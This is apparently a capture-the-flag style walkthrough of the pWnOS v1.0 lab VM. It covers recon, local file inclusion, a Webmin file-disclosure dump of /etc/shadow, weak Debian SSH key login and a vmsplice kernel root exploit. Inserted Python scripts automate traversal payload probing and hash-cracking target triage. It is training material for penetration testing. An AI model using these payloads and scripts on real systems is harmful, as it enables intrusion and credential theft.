Core dump overflow

Pentest lab - pWnOS

I’ve decided on a goal for 2016: pwn as many VulnHub boxes as I can, and train myself to a level where I can hopefully attempt the OSCP. So I scrolled back in the list of VMs to start with the older ones and work towards the newer ones. Today’s target is pWnOS v1.0, a vulnerable Linux machine that apparently offers multiple avenues to root.

Recon

I fired up Nmap as usual to see what’s listening on the box:

root@pwnbox:~#nmap -sT -sV 192.168.80.150

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2016-02-15 07:15 EST
Nmap scan report for 192.168.80.150
Host is up, received arp-response (0.00058s latency).
Not shown: 995 closed ports
Reason: 995 conn-refused
PORT      STATE SERVICE     REASON  VERSION
22/tcp    open  ssh         syn-ack OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        syn-ack Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn syn-ack Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        syn-ack MiniServ 0.01 (Webmin httpd)
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Next, I looked at the web server, and here’s what I saw:

[screenshot: pwnos 1.0 landing page]

Clicking next brought me to a not-so-typical help page:

[screenshot: help page]

No matter what skill level you choose, you will be taken to a mocking page with the text “HAHAHAHA! , for a n00b you REALLY SUCK!” (the n00b part comes from what you chose, so it will vary). I played a bit with the URL parameters, and when I changed http://192.168.80.150/index1.php?help=true&connect=true to connect=false, the server spat back some PHP warnings:

Warning: include(false) [function.include]: failed to open stream: No such file or directory in /var/www/index1.php on line 18

Warning: include() [function.include]: Failed opening 'false' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/index1.php on line 18

Thinking LFI, I tried to read a file from the system: connect=../../../../etc/passwd. No filtering in place! The warning above is the tell: the value of connect goes straight into include() on line 18 of /var/www/index1.php, so any file the web server user can read can be pulled this way (and any PHP file is executed rather than displayed, which is what makes include-based LFI so much worse than a plain file read).

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

Cool, it looks like obama, osama and yomama have been busy making accounts on this box!
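Added example (my code, not part of the original write-up): the two checks done by hand above, scripted. It generates traversal payloads for a parameter that ends up in include(), and classifies a response body as the PHP include() warning (which also leaks the script path and line number), a successful /etc/passwd read, or neither. The sample bodies are constructed from the two responses shown above; probe() is the only function that touches a target, and the base URL it expects is an assumption matching this box.

```python
import re
import urllib.error
import urllib.request

# The include() warning PHP printed when connect=false was supplied. Besides
# confirming that the parameter flows straight into include(), it leaks the
# absolute script path and the line number of the sink.
INCLUDE_WARNING = re.compile(
    r"include\((?P<arg>[^)]*)\).*?failed to open stream.*?"
    r"in (?P<script>/\S+) on line (?P<line>\d+)",
    re.DOTALL,
)
# A root entry is the usual proof that /etc/passwd actually came back.
PASSWD_SIGNATURE = re.compile(r"root:x:0:0:")

# Constructed samples, copied from the two responses shown above.
SAMPLE_WARNING_BODY = (
    "Warning: include(false) [function.include]: failed to open stream: "
    "No such file or directory in /var/www/index1.php on line 18\n"
)
SAMPLE_PASSWD_BODY = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
    "obama:x:1001:1001::/home/obama:/bin/bash\n"
)


def traversal_payloads(path, max_depth=8):
    """Yield candidate values for the vulnerable parameter.

    PHP's include() accepts an absolute path, so that is tried first. Then
    '../' sequences of increasing depth follow (extra '../' past the root are
    harmless, so deeper is safer than shallower), each in plain and
    URL-encoded form for filters that only strip the literal '../'.
    """
    rel = path.lstrip("/")
    yield path
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + rel
        yield plain
        yield plain.replace("../", "..%2f")
        yield plain.replace("../", "%2e%2e/")


def classify(body):
    """Return what a response body tells us about the include() sink."""
    if PASSWD_SIGNATURE.search(body):
        return {"result": "file_read"}
    m = INCLUDE_WARNING.search(body)
    if m:
        return {
            "result": "include_error",
            "arg": m.group("arg"),
            "script": m.group("script"),
            "line": int(m.group("line")),
        }
    return {"result": "other"}


def probe(base_url, param, path="/etc/passwd", max_depth=8, timeout=5):
    """Try each payload against a live target and return the first one that
    reads the file, or None. Needs network access; the offline samples above
    do not use it. Assumed base_url for this box:
    http://192.168.80.150/index1.php with param="connect".
    """
    for payload in traversal_payloads(path, max_depth):
        url = f"{base_url}?help=true&{param}={payload}"
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            body = err.read().decode("utf-8", "replace")  # 4xx/5xx still carry the PHP warning
        if classify(body)["result"] == "file_read":
            return payload
    return None


if __name__ == "__main__":
    print(classify(SAMPLE_WARNING_BODY))
    print(classify(SAMPLE_PASSWD_BODY))
    print(list(traversal_payloads("/etc/passwd", 2)))
```

The leaked script path matters later: once you know the web root and that the sink is include(), the next step on a real target is usually to get something you control onto disk (a log, a session file, an upload) and include that.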

I looked next at the Webmin server:

[screenshot: Webmin login page]

Tried logging in with the default credentials root/root, but it didn’t work. Time to search for some exploits!

Getting the /etc/shadow file

There is an unauthenticated file disclosure vulnerability in Webmin (CVE-2006-3392), and Metasploit has a module for it. The module description reads:

A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).

With it, I was able to pull the target’s /etc/shadow file:

msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   DIR      /unauthenticated  yes       Webmin directory path
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPATH    /etc/passwd       yes       The file to download
   RPORT    10000             yes       The target port
   VHOST                      no        HTTP server virtual host


Auxiliary action:

   Name      Description
   ----      -----------
   Download  


msf auxiliary(file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf auxiliary(file_disclosure) > run

[*] [2016.02.24-09:02:11] Attempting to retrieve /etc/shadow...
[*] [2016.02.24-09:02:11] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed

From here you could crack the hashes with our pal John the Ripper (they are all $1$ md5crypt, which is fast to crack), but I won’t go into that, because a Nessus scan revealed a shorter route to owning the target.
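Added example (not from the original post) that serves both the /etc/passwd pulled through the LFI and the /etc/shadow dump above: it parses both files, joins them, and reports which accounts actually have a hash and a login shell, what hash type it is, and when the password was last changed. The sample input is a constructed subset of the listings above.

```python
from datetime import date, timedelta

# Hash-type prefixes found in shadow(5) password fields.
HASH_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
# Shells that do not give an interactive login.
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}

# Constructed samples: a subset of the /etc/passwd and /etc/shadow lines above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
www-data:*:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
"""


def parse_passwd(text):
    """Map user name -> fields of interest from passwd(5) lines."""
    users = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue  # blank line, comment, or HTML debris around an LFI dump
        name, _, uid, gid, _gecos, home, shell = fields
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """Map user name -> (password field, last-change day number) from shadow(5) lines."""
    entries = {}
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 3:
            continue
        lastchg = int(fields[2]) if fields[2].isdigit() else None
        entries[fields[0]] = (fields[1], lastchg)
    return entries


def hash_kind(field):
    """Classify a shadow password field."""
    if field == "":
        return "empty"          # no password at all: log in without one
    if field.startswith(("*", "!")):
        return "locked"         # '*', '!', '!!' or a '!'-prefixed disabled hash
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13:
        return "descrypt"       # traditional DES crypt: 2-char salt + 11 chars
    return "unknown"


def triage(passwd_text, shadow_text):
    """Join passwd and shadow and say, per account, whether it is worth attacking.

    An account is a cracking target if it has a real hash and a login shell;
    md5crypt and descrypt are flagged as fast to crack. The last-change date
    comes from the shadow 'days since 1970-01-01' field.
    """
    users = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    report = []
    for name, info in sorted(users.items(), key=lambda kv: kv[1]["uid"]):
        field, lastchg = shadow.get(name, ("*", None))  # absent from shadow: treat as locked
        kind = hash_kind(field)
        interactive = info["shell"] not in NOLOGIN_SHELLS
        report.append({
            "user": name,
            "uid": info["uid"],
            "shell": info["shell"],
            "hash": kind,
            "target": kind not in ("empty", "locked", "unknown") and interactive,
            "passwordless": kind == "empty" and interactive,
            "fast_to_crack": kind in ("md5crypt", "descrypt"),
            "last_changed": (date(1970, 1, 1) + timedelta(days=lastchg)).isoformat()
            if lastchg is not None else None,
        })
    return report


def cracking_targets(passwd_text, shadow_text):
    """Names of accounts with a real hash and a login shell, ordered by uid."""
    return [r["user"] for r in triage(passwd_text, shadow_text) if r["target"]]


if __name__ == "__main__":
    for row in triage(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(row)
```

Feeding only the target rows to John saves time on a bigger box, and the last-change date is a hint about password policy: on this VM every hash dates from mid-2008, when the image was built.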

Exploit

The host is vulnerable to the Debian OpenSSH/OpenSSL package random number generator weakness (CVE-2008-0166, Debian advisory DSA-1571), which makes brute-forcing SSH authentication with precomputed keys practical. The Debian patch had removed the seeding of the OpenSSL PRNG, so the only varying input to key generation was the PID of the process generating the key; since Linux PIDs default to a range of 32,768, every key type and size on a given architecture has only that many possible keys, and all of them have been pregenerated and published (that is the key set used below).

Using the same Metasploit file disclosure module, it’s possible to pull each user’s ~/.ssh/authorized_keys and check whether any key trusted for login is one of the weak ones. I didn’t find anything for root, but obama has been in the house!

msf auxiliary(file_disclosure) > set RPATH /home/obama/.ssh/authorized_keys
RPATH => /home/obama/.ssh/authorized_keys
msf auxiliary(file_disclosure) > run

[*] [2016.02.29-05:02:52] Attempting to retrieve /home/obama/.ssh/authorized_keys...
[*] [2016.02.29-05:02:52] The server returned: 200 Document follows
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ== obama@ubuntuvm
[*] Auxiliary module execution completed

So we have obama’s public key and the set of vulnerable pregenerated keys downloaded earlier, which means we can grep the key set for the base64 blob:

root@pwnbox:~/debian-ssh/common_keys/rsa/2048#grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ==
dcbe2a56e8cdea6d17495f6648329ee2-4679.pub

A match! The private half is the file with the same name minus the .pub suffix, so I used it to ssh into the box as obama (wouldn’t it be nice to be able to do this on an actual White House computer.. xD)

root@pwnbox:~/debian-ssh/common_keys/rsa/2048#ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.80.150
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Feb 29 04:44:43 2016 from 192.168.80.144
obama@ubuntuvm:~$
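Added example (not part of the original write-up) of the key match done with grep above, done properly: it decodes the authorized_keys line into its RSA components, computes OpenSSH-style fingerprints, and matches candidates by modulus, which survives differences in comment or options that would make a plain grep miss. OBAMA_KEY is the line retrieved above and MATCHED_NAME the file name grep returned; the decoy key and the in-memory candidate list are constructed stand-ins for the debian-ssh key directory, and load_key_dir() walks a real one.

```python
import base64
import hashlib
from pathlib import Path

# Constructed sample: obama's authorized_keys line as retrieved above, and the
# file name the grep matched it to in the precomputed key set.
OBAMA_KEY = (
    "ssh-rsa "
    "AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0pt"
    "x2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUU"
    "c6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR"
    "362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJ"
    "QIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUOb"
    "gWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2b"
    "Ksw9GwMetQ=="
    " obama@ubuntuvm"
)
MATCHED_NAME = "dcbe2a56e8cdea6d17495f6648329ee2-4679"


def _read_string(blob, off):
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    length = int.from_bytes(blob[off:off + 4], "big")
    off += 4
    return blob[off:off + length], off + length


def _write_string(data):
    return len(data).to_bytes(4, "big") + data


def _mpint(value):
    """Encode a positive integer as an SSH mpint (extra 0x00 byte if the high bit is set)."""
    return _write_string(value.to_bytes((value.bit_length() + 8) // 8, "big"))


def parse_rsa_pubkey(line):
    """Parse an authorized_keys / .pub line into its RSA components."""
    fields = line.split()
    if "ssh-rsa" not in fields:
        raise ValueError("not an ssh-rsa key line")
    i = fields.index("ssh-rsa")  # skips any authorized_keys options before the type
    blob = base64.b64decode(fields[i + 1])
    ktype, off = _read_string(blob, 0)
    e_bytes, off = _read_string(blob, off)
    n_bytes, off = _read_string(blob, off)
    if ktype != b"ssh-rsa" or off != len(blob):
        raise ValueError("malformed ssh-rsa blob")
    n = int.from_bytes(n_bytes, "big")
    return {
        "e": int.from_bytes(e_bytes, "big"),
        "n": n,
        "bits": n.bit_length(),
        "comment": " ".join(fields[i + 2:]),
        "blob": blob,
    }


def encode_rsa_pubkey(e, n, comment=""):
    """Inverse of parse_rsa_pubkey; used here to build the decoy key."""
    blob = _write_string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    return f"ssh-rsa {base64.b64encode(blob).decode()} {comment}".strip()


def fingerprints(blob):
    """OpenSSH-style MD5 (colon hex) and SHA256 (unpadded base64) fingerprints."""
    md5 = hashlib.md5(blob).hexdigest()
    sha = base64.b64encode(hashlib.sha256(blob).digest()).rstrip(b"=").decode()
    return "MD5:" + ":".join(md5[i:i + 2] for i in range(0, 32, 2)), "SHA256:" + sha


def match_modulus(target_line, candidates):
    """Names of candidate keys whose RSA modulus equals the target's.

    candidates is an iterable of (name, key line). Two keys with the same
    modulus are the same key whatever the comment says, so this is the
    comparison that matters.
    """
    target_n = parse_rsa_pubkey(target_line)["n"]
    hits = []
    for name, line in candidates:
        try:
            if parse_rsa_pubkey(line)["n"] == target_n:
                hits.append(name)
        except (ValueError, IndexError):
            continue  # non-RSA or corrupt file in the directory
    return hits


def load_key_dir(root):
    """Yield (private key path, pub line) for every .pub under a directory such as
    debian-ssh/common_keys/rsa/2048; the private key sits beside it without .pub."""
    for pub in sorted(Path(root).rglob("*.pub")):
        yield str(pub.with_suffix("")), pub.read_text().strip()


def demo_candidates():
    """Constructed stand-in for the key directory: one decoy and the real match."""
    decoy = encode_rsa_pubkey(65537, (1 << 2047) | 0x5C0FFEE1, "decoy")
    return [("deadbeef-1234", decoy), (MATCHED_NAME, OBAMA_KEY)]


if __name__ == "__main__":
    key = parse_rsa_pubkey(OBAMA_KEY)
    print(key["bits"], "bit RSA, e =", key["e"], *fingerprints(key["blob"]))
    print("weak-key matches:", match_modulus(OBAMA_KEY, demo_candidates()))
```

Two things the decode shows that the grep did not: the key is 2048-bit RSA with the old OpenSSH public exponent 35, which is why the rsa/2048 directory was the right place to look, and the MD5 fingerprint is what the Debian blacklist files and ssh-vulnkey keyed on, so the same check can be run from the host side against an authorized_keys file without any key set at all.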

Privilege escalation

The kernel version of the system is outdated:

obama@ubuntuvm:~$ uname -a
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux

Googling it instantly brought some good news about vmsplice_to_pipe(), a local privilege escalation vulnerability (CVE-2008-0600) that affects kernels 2.6.17 through 2.6.24.1 and was fixed in 2.6.24.2. The source is available on ExploitDB (EDB-ID 5092). You can see that the author didn’t lack any imagination with the name of the source code file (read the first line, it’s hilarious) xD

Ok, back to business. I downloaded the file on the compromised box (I had to use --no-check-certificate because I would get an error otherwise; the box’s 2007-era wget most likely predates SNI, so it is handed the CDN’s *.mycloudproxy.com certificate and rejects the name mismatch, as the warnings below show). That is fine in a lab, but on a real engagement you don’t want to compile and run a root exploit fetched over an unverified connection; copy it over from your own machine instead:

obama@ubuntuvm:~$ wget -O vmsplice.c https://www.exploit-db.com/download/5092 --no-check-certificate
--05:27:51--  https://www.exploit-db.com/download/5092
           => `vmsplice.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.mycloudproxy.com' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 6,293 (6.1K) [application/txt]

100%[============================================================================================================================>] 6,293         --.--K/s             

05:27:52 (1.07 GB/s) - `vmsplice.c' saved [6293/6293]

Compiled and ran it... and we are root! (Kernel exploits like this one can just as easily panic the box, so take a VM snapshot before trying them.)

obama@ubuntuvm:~$ gcc -o vmsplice vmsplice.c
obama@ubuntuvm:~$ ./vmsplice 
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e4b000 .. 0xb7e7d000
[+] root
root@ubuntuvm:~# whoami
root

Challenge completed! :D

 _________________________________________
/ Q: How many IBM types does it take to   \
| change a light bulb? A: Fifteen. One to |
| do it, and fourteen to write document   |
| number                                  |
|                                         |
| GC7500439-0001, Multitasking            |
| Incandescent Source System Facility,    |
|                                         |
| of which 10% of the pages state only    |
| "This page intentionally                |
|                                         |
| left blank", and 20% of the definitions |
| are of the form "A:.....                |
|                                         |
| consists of sequences of non-blank      |
\ characters separated by blanks".        /
 -----------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
